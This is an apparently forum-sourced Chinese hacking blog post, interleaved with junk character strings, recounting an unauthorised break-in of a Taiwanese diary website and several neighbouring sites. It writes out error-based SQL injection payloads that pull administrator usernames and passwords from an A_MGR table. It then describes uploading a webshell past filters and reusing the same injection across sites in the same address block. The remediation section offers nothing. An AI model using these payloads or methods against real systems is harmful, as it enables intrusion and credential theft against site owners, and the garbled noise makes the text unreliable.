发现一个注入点
% b3 F$ N6 T! l0 U1 r. Vhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389' n4 [7 P$ O( v# }
% {6 c4 \- Z5 l2 W9 v5 e
习惯性的加’having1=1--
4 J+ w9 ~3 @1 i. \1 e# k3 `9 f( e3 f+ {+ H; W" l' L% V" F
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—/ S+ K \* o+ C% v
! p9 D1 I; i% n0 S0 D* }% X* e& T% L7 P5 T
2 C# C3 p' n# H$ l7 h爆出Diary_A.dl_Title(这时候很激动啊), |' L( [! J5 l4 n' a
% v# s6 N L: s& x# _0 ^那么继续
% v3 L* z2 F! R" \http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
5 L! Y- p1 Q1 i: s; {$ L+ H+ V) E! G h: |" A: z# W3 R# ^
继续,一直爆下去( o: m* N5 r; S6 Z- n( i" g
; e+ K8 r! A' E2 s6 X
爆到几个字段和表段 但是没找到需要的管理用户的字段/ k# t7 e; C( q3 ]/ ^; x- z6 h
" S9 o+ b( \6 j& I$ p
蛋疼了 怎么办 然后去后台登陆页看源码( u: U$ x" {: S1 Z& e) G$ u
4 \, {" a- K# j4 Y- N' @0 U0 A+ v0
" [& n+ S7 K \. D4 F5 u- Y3 K- k$ p. y. p' u$ T# W% W% S* O
Input name= “ADUID”
d! |6 b# @5 X# ZInput name= “ADPWD”
$ ~( e" Q/ R& U1 C9 o1 x2 `. F
0 \7 L' t3 c& m2 w9 n4 K* s很幸运 找到了字段那就继续3 V6 ]0 e( E% S& M$ S
找到之后开始爆用户
, \# D3 h |0 \0 w* Bhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—$ j {% S9 o A/ Q5 ` R
爆密码+ I6 z5 B! ?$ K6 d
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—7 X0 Y. ]: v& i9 X( ]8 d
测试了下 这个注入点只能爆到文章哪里的表 % z, S, P# S- Z9 Z; l
; Y3 f6 ^6 J3 V) R) {
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了! d. L+ j; ~& `% a5 B! J: {
. @8 Q4 X% I: A9 [
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了" O' J* N1 P% q* K$ c6 D
+ o9 Y& S6 K6 \473
( d8 K) ~: N5 }% t9 P3 T" d( H4 ^+ O% S0 y, n: P! n% S i
进后台$ X& C! V; `# T0 g
E5 W: C: D' Z3 r
/ r' V3 t0 U- ^发现几个上传点 有的地方不能上传 而且防止恶意代码- l$ Z$ E9 J+ @" `2 y, e4 M! m8 d
; P" i- l# V( N7 `没办法 各种百度各种找大牛 找到一只好像可以突破的马
0 o! Q2 W. K) ~1 l% S9 w9 T& Z* r5 ~* ~& E4 F$ q! S; A6 ~1 Q) B9 S
4 ?0 a6 i0 }- d5 A在系统管理那里直接上传 不过没有显示地址+ E% x5 x- d4 }( J( ]
$ N* t; I6 V, N8 _5 T. @$ H
再上传一次 抓包 搞定OK
+ j* a: y# l' x- y, ^! ?' B) }6 D3 K' ^5 R. Y0 M
! i: C! `- f$ |% T7 l$ g, R% O( ^
8 G3 B5 |! o `3 B
472
6 |5 ?, s& {) C1 V2 ~! ?
2 ?' c' {2 @# ^晚上不行了 去睡觉。。。4 \5 K" ` J- {2 k
第二天刚起床 闲的没事做继续日站吧 - a5 ~# R, m3 f4 e7 X
8 \# }/ i- ]9 I7 S, `找个站 就把这个站的旁c扫了下# q2 o$ P1 g1 G Y# K% i
9 O0 ~! j' j4 [发现c段也有一个购物站 ,然后还和这个站的模板差不多
7 Q' P, J8 X! z) t
) D: T3 W; N& B2 y: u就找到会员登录口测试' x; ~( q5 i$ }6 q" v
1 k V+ t/ I* A7 W8 w
'and (select top 1 MGR_UID from A_MGR)>0—( l* D+ F( x' I$ N6 b6 r! t
果断爆到了 这时候我很激动 通杀& ]8 t. G4 v% O- U, T
5 \ y2 P! z& T2 a: J
再次翻c段
* c- q& L- U9 ~# X6 n% a& J+ G5 R3 [ }- c T/ T/ m2 i1 H
翻出几个站 都成功拿下* g4 X: D" O/ K) L; ^. R) {
: @ l) U1 f! [8 E% R; `# L3 [
) \% q( a( S% e) j
修复方案:7 O8 o0 L W$ H. ^/ K, b$ C
他们比我专业 5 b9 V0 m* T% {! N
9 c. E0 s) z! N8 d
" C: K9 q4 \/ I, Q# Q! J( `3 U( J
8 ~" W6 S7 i% A& b5 X3 O |